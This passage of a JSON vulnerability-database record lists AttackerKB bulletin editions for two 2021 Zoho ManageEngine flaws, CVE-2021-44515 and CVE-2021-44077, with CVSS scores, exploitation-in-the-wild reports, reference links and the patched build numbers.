"https://www.cisa.gov/uscert/ncas/current-activity/2021/12/10/cisa-adds-thirteen-known-exploited-vulnerabilities-catalog", "published": "2021-12-13T14:57:00"}, {"category": "News Article or Blog", "source_url": "https://www.tenable.com/blog/cve-2021-44515-zoho-patches-manageengine-zero-day-exploited-in-the-wild", "published": "2021-12-13T14:57:00"}], "references_categories": {"Canonical": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44515"], "Advisory": ["https://pitstop.manageengine.com/portal/en/community/topic/an-authentication-bypass-vulnerability-identified-and-fixed-in-desktop-central-and-desktop-central-msp", "https://www.manageengine.com/products/desktop-central/cve-2021-44515-authentication-bypass-filter-configuration.html"], "Miscellaneous": ["https://www.cisa.gov/uscert/ncas/current-activity/2021/12/10/cisa-adds-thirteen-known-exploited-vulnerabilities-catalog"]}, "tags": [], "mitre_vector": {}, "last_activity": "2021-12-13T14:57:00"}, "lastseen": "2021-12-13T16:42:55", "differentElements": ["cvss", "cvss2", "cvss3"], "edition": 1}, {"bulletin": {"id": "AKB:691FE896-C4DF-492A-BF1B-2E720F24CB12", "vendorId": null, "hash": "87f68efa319852c7e7b3379903cb2bb4", "type": "attackerkb", "bulletinFamily": "info", "title": "CVE-2021-44515", "description": "Zoho ManageEngine Desktop Central is vulnerable to authentication bypass, leading to remote code execution on the server, as exploited in the wild in December 2021. For Enterprise builds 10.1.2127.17 and earlier, upgrade to 10.1.2127.18. For Enterprise builds 10.1.2128.0 through 10.1.2137.2, upgrade to 10.1.2137.3. For MSP builds 10.1.2127.17 and earlier, upgrade to 10.1.2127.18. For MSP builds 10.1.2128.0 through 10.1.2137.2, upgrade to 10.1.2137.3.\n\n \n**Recent assessments:** \n \nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "published": "2021-12-13T00:00:00", "modified": "2021-12-13T00:00:00", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "baseScore": 10.0}, "severity": "HIGH", "exploitabilityScore": 10.0, "impactScore": 10.0, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}, "cvss3": {"cvssV3": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL"}, "exploitabilityScore": 3.9, "impactScore": 5.9}, "href": "https://attackerkb.com/topics/rJw4DFI2RQ/cve-2021-44515", "reporter": "AttackerKB", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44515", "https://pitstop.manageengine.com/portal/en/community/topic/an-authentication-bypass-vulnerability-identified-and-fixed-in-desktop-central-and-desktop-central-msp", "https://www.manageengine.com/products/desktop-central/cve-2021-44515-authentication-bypass-filter-configuration.html", "https://www.cisa.gov/uscert/ncas/current-activity/2021/12/10/cisa-adds-thirteen-known-exploited-vulnerabilities-catalog"], "cvelist": ["CVE-2021-44515"], "immutableFields": [], "lastseen": "2021-12-17T10:42:29", "history": [], "viewCount": 17, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2021-44515"]}, {"type": "nessus", "idList": ["MANAGEENGINE_DESKTOP_CENTRAL_10_1_2137_3.NASL"]}, {"type": "cisa", "idList": ["CISA:C9AC32BB051B58B7F0F6E0FD2949390C", "CISA:380E63A9EAAD85FA1950A6973017E11B"]}, {"type": "thn", "idList": ["THN:DB8E18C57AFB9EEEFDABD840FBF5D938"]}, {"type": "hivepro", "idList": ["HIVEPRO:C7C4C4FD6D71992EA2AF88F0ECFBD280"]}], "modified": "2021-12-17T10:42:29", "rev": 2}, "score": {"value": 5.4, "vector": "NONE", "modified": "2021-12-17T10:42:29", "rev": 2}}, "objectVersion": "1.6", "attackerkb": {"attackerValue": 0, "exploitability": 0}, "wildExploited": true, "wildExploitedCategory": {"Government or Industry Alert": ""}, "wildExploitedReports": [{"category": "Government or Industry Alert", "source_url": "https://www.cisa.gov/uscert/ncas/current-activity/2021/12/10/cisa-adds-thirteen-known-exploited-vulnerabilities-catalog", "published": "2021-12-13T14:57:00"}, {"category": "News Article or Blog", "source_url": "https://www.tenable.com/blog/cve-2021-44515-zoho-patches-manageengine-zero-day-exploited-in-the-wild", "published": "2021-12-13T14:57:00"}], "references_categories": {"Canonical": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44515"], "Advisory": ["https://pitstop.manageengine.com/portal/en/community/topic/an-authentication-bypass-vulnerability-identified-and-fixed-in-desktop-central-and-desktop-central-msp", "https://www.manageengine.com/products/desktop-central/cve-2021-44515-authentication-bypass-filter-configuration.html"], "Miscellaneous": ["https://www.cisa.gov/uscert/ncas/current-activity/2021/12/10/cisa-adds-thirteen-known-exploited-vulnerabilities-catalog"]}, "tags": [], "mitre_vector": {}, "last_activity": "2021-12-13T14:57:00"}, "lastseen": "2021-12-17T10:42:29", "differentElements": ["wildExploitedReports"], "edition": 2}, {"bulletin": {"id": "AKB:691FE896-C4DF-492A-BF1B-2E720F24CB12", "vendorId": null, "hash": "e53a9ee58ec6b84fd5dc6b87c3242a2b", "type": "attackerkb", "bulletinFamily": "info", "title": "CVE-2021-44515", "description": "Zoho ManageEngine Desktop Central is vulnerable to authentication bypass, leading to remote code execution on the server, as exploited in the wild in December 2021. For Enterprise builds 10.1.2127.17 and earlier, upgrade to 10.1.2127.18. For Enterprise builds 10.1.2128.0 through 10.1.2137.2, upgrade to 10.1.2137.3. For MSP builds 10.1.2127.17 and earlier, upgrade to 10.1.2127.18. For MSP builds 10.1.2128.0 through 10.1.2137.2, upgrade to 10.1.2137.3.\n\n \n**Recent assessments:** \n \nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "published": "2021-12-13T00:00:00", "modified": "2021-12-13T00:00:00", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "baseScore": 10.0}, "severity": "HIGH", "exploitabilityScore": 10.0, "impactScore": 10.0, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}, "cvss3": {"cvssV3": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL"}, "exploitabilityScore": 3.9, "impactScore": 5.9}, "href": "https://attackerkb.com/topics/rJw4DFI2RQ/cve-2021-44515", "reporter": "AttackerKB", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44515", "https://pitstop.manageengine.com/portal/en/community/topic/an-authentication-bypass-vulnerability-identified-and-fixed-in-desktop-central-and-desktop-central-msp", "https://www.manageengine.com/products/desktop-central/cve-2021-44515-authentication-bypass-filter-configuration.html", "https://www.cisa.gov/uscert/ncas/current-activity/2021/12/10/cisa-adds-thirteen-known-exploited-vulnerabilities-catalog"], "cvelist": ["CVE-2021-44515"], "immutableFields": [], "lastseen": "2021-12-21T16:51:56", "history": [], "viewCount": 18, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2021-44515"]}, {"type": "nessus", "idList": ["MANAGEENGINE_DESKTOP_CENTRAL_10_1_2137_3.NASL"]}, {"type": "cisa", "idList": ["CISA:C9AC32BB051B58B7F0F6E0FD2949390C", "CISA:380E63A9EAAD85FA1950A6973017E11B"]}, {"type": "threatpost", "idList": ["THREATPOST:927CAECDA58E6BC3266D14FE340589BB"]}, {"type": "hivepro", "idList": ["HIVEPRO:C7C4C4FD6D71992EA2AF88F0ECFBD280"]}, {"type": "thn", "idList": ["THN:DB8E18C57AFB9EEEFDABD840FBF5D938"]}], "modified": "2021-12-21T16:51:56", "rev": 2}, "score": {"value": 5.6, "vector": "NONE", "modified": "2021-12-21T16:51:56", "rev": 2}}, "objectVersion": "1.6", "attackerkb": {"attackerValue": 0, "exploitability": 0}, "wildExploited": true, "wildExploitedCategory": {"Government or Industry Alert": ""}, "wildExploitedReports": [{"category": "Government or Industry Alert", "source_url": "https://www.cisa.gov/uscert/ncas/current-activity/2021/12/10/cisa-adds-thirteen-known-exploited-vulnerabilities-catalog", "published": "2021-12-13T14:57:00"}, {"category": "News Article or Blog", "source_url": "https://www.tenable.com/blog/cve-2021-44515-zoho-patches-manageengine-zero-day-exploited-in-the-wild", "published": "2021-12-13T14:57:00"}, {"category": "Other:", "source_url": "https://www.ic3.gov/Media/News/2021/211220.pdf", "published": "2021-12-13T14:57:00"}], "references_categories": {"Canonical": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44515"], "Advisory": ["https://pitstop.manageengine.com/portal/en/community/topic/an-authentication-bypass-vulnerability-identified-and-fixed-in-desktop-central-and-desktop-central-msp", "https://www.manageengine.com/products/desktop-central/cve-2021-44515-authentication-bypass-filter-configuration.html"], "Miscellaneous": ["https://www.cisa.gov/uscert/ncas/current-activity/2021/12/10/cisa-adds-thirteen-known-exploited-vulnerabilities-catalog"]}, "tags": [], "mitre_vector": {}, "last_activity": "2021-12-13T14:57:00"}, "lastseen": "2021-12-21T16:51:56", "differentElements": ["attackerkb", "description", "last_activity", "modified", "published", "tags"], "edition": 3}, {"bulletin": {"id": "AKB:691FE896-C4DF-492A-BF1B-2E720F24CB12", "vendorId": null, "hash": "19ae404a5c67af898e3b97da2ebcd3f1", "type": "attackerkb", "bulletinFamily": "info", "title": "CVE-2021-44515", "description": "Zoho ManageEngine Desktop Central is vulnerable to authentication bypass, leading to remote code execution on the server, as exploited in the wild in December 2021. For Enterprise builds 10.1.2127.17 and earlier, upgrade to 10.1.2127.18. For Enterprise builds 10.1.2128.0 through 10.1.2137.2, upgrade to 10.1.2137.3. For MSP builds 10.1.2127.17 and earlier, upgrade to 10.1.2127.18. For MSP builds 10.1.2128.0 through 10.1.2137.2, upgrade to 10.1.2137.3.\n\n \n**Recent assessments:** \n \n**wvu-r7** at January 14, 2022 9:36am UTC reported:\n\nPlease see the [Rapid7 analysis](<https://attackerkb.com/topics/rJw4DFI2RQ/cve-2021-44515/rapid7-analysis>).\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5Assessed Attacker Value: 4\n", "published": "2022-01-14T00:00:00", "modified": "2022-01-14T00:00:00", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "baseScore": 10.0}, "severity": "HIGH", "exploitabilityScore": 10.0, "impactScore": 10.0, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}, "cvss3": {"cvssV3": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL"}, "exploitabilityScore": 3.9, "impactScore": 5.9}, "href": "https://attackerkb.com/topics/rJw4DFI2RQ/cve-2021-44515", "reporter": "AttackerKB", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44515", "https://pitstop.manageengine.com/portal/en/community/topic/an-authentication-bypass-vulnerability-identified-and-fixed-in-desktop-central-and-desktop-central-msp", "https://www.manageengine.com/products/desktop-central/cve-2021-44515-authentication-bypass-filter-configuration.html", "https://www.cisa.gov/uscert/ncas/current-activity/2021/12/10/cisa-adds-thirteen-known-exploited-vulnerabilities-catalog"], "cvelist": ["CVE-2021-44515"], "immutableFields": [], "lastseen": "2022-01-14T11:36:03", "history": [], "viewCount": 19, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2021-44515"]}, {"type": "nessus", "idList": ["MANAGEENGINE_DESKTOP_CENTRAL_10_1_2137_3.NASL"]}, {"type": "cisa", "idList": ["CISA:380E63A9EAAD85FA1950A6973017E11B", "CISA:C9AC32BB051B58B7F0F6E0FD2949390C"]}, {"type": "hivepro", "idList": ["HIVEPRO:C7C4C4FD6D71992EA2AF88F0ECFBD280"]}, {"type": "threatpost", "idList": ["THREATPOST:927CAECDA58E6BC3266D14FE340589BB"]}, {"type": "thn", "idList": ["THN:DB8E18C57AFB9EEEFDABD840FBF5D938"]}], "modified": "2022-01-14T11:36:03", "rev": 2}, "score": {"value": 5.4, "vector": "NONE", "modified": "2022-01-14T11:36:03", "rev": 2}}, "objectVersion": "1.6", "attackerkb": {"attackerValue": 5, "exploitability": 4}, "wildExploited": true, "wildExploitedCategory": {"Government or Industry Alert": ""}, "wildExploitedReports": [{"category": "Government or Industry Alert", "source_url": "https://www.cisa.gov/uscert/ncas/current-activity/2021/12/10/cisa-adds-thirteen-known-exploited-vulnerabilities-catalog", "published": "2021-12-13T14:57:00"}, {"category": "News Article or Blog", "source_url": "https://www.tenable.com/blog/cve-2021-44515-zoho-patches-manageengine-zero-day-exploited-in-the-wild", "published": "2021-12-13T14:57:00"}, {"category": "Other:", "source_url": "https://www.ic3.gov/Media/News/2021/211220.pdf", "published": "2021-12-13T14:57:00"}], "references_categories": {"Canonical": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44515"], "Advisory": ["https://pitstop.manageengine.com/portal/en/community/topic/an-authentication-bypass-vulnerability-identified-and-fixed-in-desktop-central-and-desktop-central-msp", "https://www.manageengine.com/products/desktop-central/cve-2021-44515-authentication-bypass-filter-configuration.html"], "Miscellaneous": ["https://www.cisa.gov/uscert/ncas/current-activity/2021/12/10/cisa-adds-thirteen-known-exploited-vulnerabilities-catalog"]}, "tags": ["common_enterprise", "high_privilege_access", "pre_auth", "default_configuration"], "mitre_vector": {}, "last_activity": "2022-01-14T09:36:00"}, "lastseen": "2022-01-14T11:36:03", "differentElements": ["mitre_vector"], "edition": 4}, {"bulletin": {"id": "AKB:691FE896-C4DF-492A-BF1B-2E720F24CB12", "vendorId": null, "hash": "abd2cd2804c63ae03d22835103fb2e84", "type": "attackerkb", "bulletinFamily": "info", "title": "CVE-2021-44515", "description": "Zoho ManageEngine Desktop Central is vulnerable to authentication bypass, leading to remote code execution on the server, as exploited in the wild in December 2021. For Enterprise builds 10.1.2127.17 and earlier, upgrade to 10.1.2127.18. For Enterprise builds 10.1.2128.0 through 10.1.2137.2, upgrade to 10.1.2137.3. For MSP builds 10.1.2127.17 and earlier, upgrade to 10.1.2127.18. For MSP builds 10.1.2128.0 through 10.1.2137.2, upgrade to 10.1.2137.3.\n\n \n**Recent assessments:** \n \n**wvu-r7** at January 14, 2022 9:36am UTC reported:\n\nPlease see the [Rapid7 analysis](<https://attackerkb.com/topics/rJw4DFI2RQ/cve-2021-44515/rapid7-analysis>).\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5Assessed Attacker Value: 4\n", "published": "2022-01-14T00:00:00", "modified": "2022-01-14T00:00:00", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "baseScore": 10.0}, "severity": "HIGH", "exploitabilityScore": 10.0, "impactScore": 10.0, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}, "cvss3": {"cvssV3": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL"}, "exploitabilityScore": 3.9, "impactScore": 5.9}, "href": "https://attackerkb.com/topics/rJw4DFI2RQ/cve-2021-44515", "reporter": "AttackerKB", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44515", "https://pitstop.manageengine.com/portal/en/community/topic/an-authentication-bypass-vulnerability-identified-and-fixed-in-desktop-central-and-desktop-central-msp", "https://www.manageengine.com/products/desktop-central/cve-2021-44515-authentication-bypass-filter-configuration.html", "https://www.cisa.gov/uscert/ncas/current-activity/2021/12/10/cisa-adds-thirteen-known-exploited-vulnerabilities-catalog"], "cvelist": ["CVE-2021-44515"], "immutableFields": [], "lastseen": "2022-01-14T14:31:13", "history": [], "viewCount": 19, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2021-44515"]}, {"type": "nessus", "idList": ["MANAGEENGINE_DESKTOP_CENTRAL_10_1_2137_3.NASL"]}, {"type": "cisa", "idList": ["CISA:380E63A9EAAD85FA1950A6973017E11B", "CISA:C9AC32BB051B58B7F0F6E0FD2949390C"]}, {"type": "hivepro", "idList": ["HIVEPRO:C7C4C4FD6D71992EA2AF88F0ECFBD280"]}, {"type": "threatpost", "idList": ["THREATPOST:927CAECDA58E6BC3266D14FE340589BB"]}, {"type": "thn", "idList": ["THN:DB8E18C57AFB9EEEFDABD840FBF5D938"]}], "modified": "2022-01-14T14:31:13", "rev": 2}, "score": {"value": 5.4, "vector": "NONE", "modified": "2022-01-14T14:31:13", "rev": 2}}, "objectVersion": "1.6", "attackerkb": {"attackerValue": 5, "exploitability": 4}, "wildExploited": true, "wildExploitedCategory": {"Government or Industry Alert": ""}, "wildExploitedReports": [{"category": "Government or Industry Alert", "source_url": "https://www.cisa.gov/uscert/ncas/current-activity/2021/12/10/cisa-adds-thirteen-known-exploited-vulnerabilities-catalog", "published": "2021-12-13T14:57:00"}, {"category": "News Article or Blog", "source_url": "https://www.tenable.com/blog/cve-2021-44515-zoho-patches-manageengine-zero-day-exploited-in-the-wild", "published": "2021-12-13T14:57:00"}, {"category": "Other:", "source_url": "https://www.ic3.gov/Media/News/2021/211220.pdf", "published": "2021-12-13T14:57:00"}], "references_categories": {"Canonical": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44515"], "Advisory": ["https://pitstop.manageengine.com/portal/en/community/topic/an-authentication-bypass-vulnerability-identified-and-fixed-in-desktop-central-and-desktop-central-msp", "https://www.manageengine.com/products/desktop-central/cve-2021-44515-authentication-bypass-filter-configuration.html"], "Miscellaneous": ["https://www.cisa.gov/uscert/ncas/current-activity/2021/12/10/cisa-adds-thirteen-known-exploited-vulnerabilities-catalog"]}, "tags": ["common_enterprise", "high_privilege_access", "pre_auth", "default_configuration"], "mitre_vector": {"Defense Evasion": ["Obfuscated Files or Information(Validated)", "Obfuscated Files or Information: Software Packing(Validated)"]}, "last_activity": "2022-01-14T09:36:00"}, "lastseen": "2022-01-14T14:31:13", "differentElements": ["last_activity", "modified", "published"], "edition": 5}], "viewCount": 24, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2021-44515"]}, {"type": "nessus", "idList": ["MANAGEENGINE_DESKTOP_CENTRAL_10_1_2137_3.NASL"]}, {"type": "cisa", "idList": ["CISA:380E63A9EAAD85FA1950A6973017E11B", "CISA:C9AC32BB051B58B7F0F6E0FD2949390C"]}, {"type": "thn", "idList": ["THN:A29E47C7A7467A109B420FF0819814EE", "THN:DB8E18C57AFB9EEEFDABD840FBF5D938"]}, {"type": "hivepro", "idList": ["HIVEPRO:C7C4C4FD6D71992EA2AF88F0ECFBD280"]}, {"type": "threatpost", "idList": ["THREATPOST:98AF08B524D08ABCEB115FECEE99B70F", "THREATPOST:927CAECDA58E6BC3266D14FE340589BB"]}], "modified": "2022-01-15T05:29:21", "rev": 2}, "score": {"value": 5.4, "vector": "NONE", "modified": "2022-01-15T05:29:21", "rev": 2}}, "objectVersion": "1.6", "attackerkb": {"attackerValue": 5, "exploitability": 4}, "wildExploited": true, "wildExploitedCategory": {"Government or Industry Alert": ""}, "wildExploitedReports": [{"category": "Government or Industry Alert", "source_url": "https://www.cisa.gov/uscert/ncas/current-activity/2021/12/10/cisa-adds-thirteen-known-exploited-vulnerabilities-catalog", "published": "2021-12-13T14:57:00"}, {"category": "News Article or Blog", "source_url": "https://www.tenable.com/blog/cve-2021-44515-zoho-patches-manageengine-zero-day-exploited-in-the-wild", "published": "2021-12-13T14:57:00"}, {"category": "Other:", "source_url": "https://www.ic3.gov/Media/News/2021/211220.pdf", "published": "2021-12-13T14:57:00"}], "references_categories": {"Canonical": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44515"], "Advisory": ["https://pitstop.manageengine.com/portal/en/community/topic/an-authentication-bypass-vulnerability-identified-and-fixed-in-desktop-central-and-desktop-central-msp", "https://www.manageengine.com/products/desktop-central/cve-2021-44515-authentication-bypass-filter-configuration.html"], "Miscellaneous": ["https://www.cisa.gov/uscert/ncas/current-activity/2021/12/10/cisa-adds-thirteen-known-exploited-vulnerabilities-catalog"]}, "tags": ["common_enterprise", "high_privilege_access", "pre_auth", "default_configuration"], "mitre_vector": {"Defense Evasion": ["Obfuscated Files or Information(Validated)", "Obfuscated Files or Information: Software Packing(Validated)"]}, "last_activity": "2022-01-15T00:00:00", "_object_type": "robots.models.attackerkb.AttackerKB", "_object_types": ["robots.models.attackerkb.AttackerKB", "robots.models.base.Bulletin"]}, {"id": "AKB:72CD807D-E26D-4F68-8717-436863B7F8B1", "vendorId": null, "hash": "553fd58399c04d83f19c7a8d2a7d1b04", "type": "attackerkb", "bulletinFamily": "info", "title": "CVE-2021-44077", "description": "Zoho ManageEngine ServiceDesk Plus before 11306, ServiceDesk Plus MSP before 10530, and SupportCenter Plus before 11014 are vulnerable to unauthenticated remote code execution. This is related to /RestAPI URLs in a servlet, and ImportTechnicians in the Struts configuration.\n\n \n**Recent assessments:** \n \n**wvu-r7** at December 08, 2021 7:41pm UTC reported:\n\nPlease see the [Rapid7 analysis](<https://attackerkb.com/topics/qv2aD8YfMN/cve-2021-44077/rapid7-analysis>).\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5Assessed Attacker Value: 5\n", "published": "2022-01-10T00:00:00", "modified": "2022-01-10T00:00:00", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cvss2": {"cvssV2": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "baseScore": 7.5}, "severity": "HIGH", "exploitabilityScore": 10.0, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}, "cvss3": {"cvssV3": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL"}, "exploitabilityScore": 3.9, "impactScore": 5.9}, "href": "https://attackerkb.com/topics/qv2aD8YfMN/cve-2021-44077", "reporter": "AttackerKB", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44077", "https://pitstop.manageengine.com/portal/en/community/topic/security-advisory-for-cve-2021-44077-unauthenticated-rce-vulnerability-in-servicedesk-plus-versions-up-to-11305-22-11-2021", "https://pitstop.manageengine.com/portal/en/community/topic/security-advisory-authentication-bypass-vulnerability-in-servicedesk-plus-versions-11138-and-above", "https://pitstop.manageengine.com/portal/en/community/topic/security-advisory-for-cve-2021-44077-unauthenticated-rce-vulnerability-in-servicedesk-plus-msp-versions-10527-till-10529", "https://pitstop.manageengine.com/portal/en/community/topic/security-advisory-for-cve-2021-44077-unauthenticated-rce-vulnerability-in-supportcenter-plus-versions-11012-and-11013", "http://packetstormsecurity.com/files/165400/ManageEngine-ServiceDesk-Plus-Remote-Code-Execution.html"], "cvelist": ["CVE-2021-44077"], "immutableFields": [], "lastseen": "2022-01-19T20:29:57", "history": [{"bulletin": {"id": "AKB:72CD807D-E26D-4F68-8717-436863B7F8B1", "vendorId": null, "hash": "7f9972369aa74ebebf5b4d223ce265b7", "type": "attackerkb", "bulletinFamily": "info", "title": "CVE-2021-44077", "description": "Zoho ManageEngine ServiceDesk Plus before 11306, ServiceDesk Plus MSP before 10530, and SupportCenter Plus before 11014 are vulnerable to unauthenticated remote code execution. This is related to /RestAPI URLs in a servlet, and ImportTechnicians in the Struts configuration.\n\n \n**Recent assessments:** \n \n**wvu-r7** at December 08, 2021 7:41pm UTC reported:\n\nPlease see the [Rapid7 analysis](<https://attackerkb.com/topics/qv2aD8YfMN/cve-2021-44077/rapid7-analysis>).\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5Assessed Attacker Value: 5\n", "published": "2021-12-08T00:00:00", "modified": "2021-12-08T00:00:00", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 3.9, "impactScore": 5.9}, "href": "https://attackerkb.com/topics/qv2aD8YfMN/cve-2021-44077", "reporter": "AttackerKB", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44077"], "cvelist": ["CVE-2021-44077"], "immutableFields": [], "lastseen": "2021-12-08T22:55:51", "history": [], "viewCount": 1, "enchantments": {}, "objectVersion": "1.6", "attackerkb": {"attackerValue": 5, "exploitability": 5}, "wildExploited": true, "wildExploitedCategory": {"Government or Industry Alert": ""}, "wildExploitedReports": [{"category": "Government or Industry Alert", "source_url": "https://www.cisa.gov/uscert/ncas/alerts/aa21-336a", "published": "2021-12-08T19:41:00"}], "references_categories": {"Canonical": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44077"]}, "tags": ["common_enterprise", "easy_to_develop", "high_privilege_access", "pre_auth", "default_configuration"], "mitre_vector": {}, "last_activity": "2021-12-08T19:41:00"}, "lastseen": "2021-12-08T22:55:51", "differentElements": ["last_activity", "modified", "published"], "edition": 1}, {"bulletin": {"id": "AKB:72CD807D-E26D-4F68-8717-436863B7F8B1", "vendorId": null, "hash": "1ae8638fbf0f6e641b05711d71184f13", "type": "attackerkb", "bulletinFamily": "info", "title": "CVE-2021-44077", "description": "Zoho ManageEngine ServiceDesk Plus before 11306, ServiceDesk Plus MSP before 10530, and SupportCenter Plus before 11014 are vulnerable to unauthenticated remote code execution. This is related to /RestAPI URLs in a servlet, and ImportTechnicians in the Struts configuration.\n\n \n**Recent assessments:** \n \n**wvu-r7** at December 08, 2021 7:41pm UTC reported:\n\nPlease see the [Rapid7 analysis](<https://attackerkb.com/topics/qv2aD8YfMN/cve-2021-44077/rapid7-analysis>).\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5Assessed Attacker Value: 5\n", "published": "2021-12-09T00:00:00", "modified": "2021-12-09T00:00:00", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": 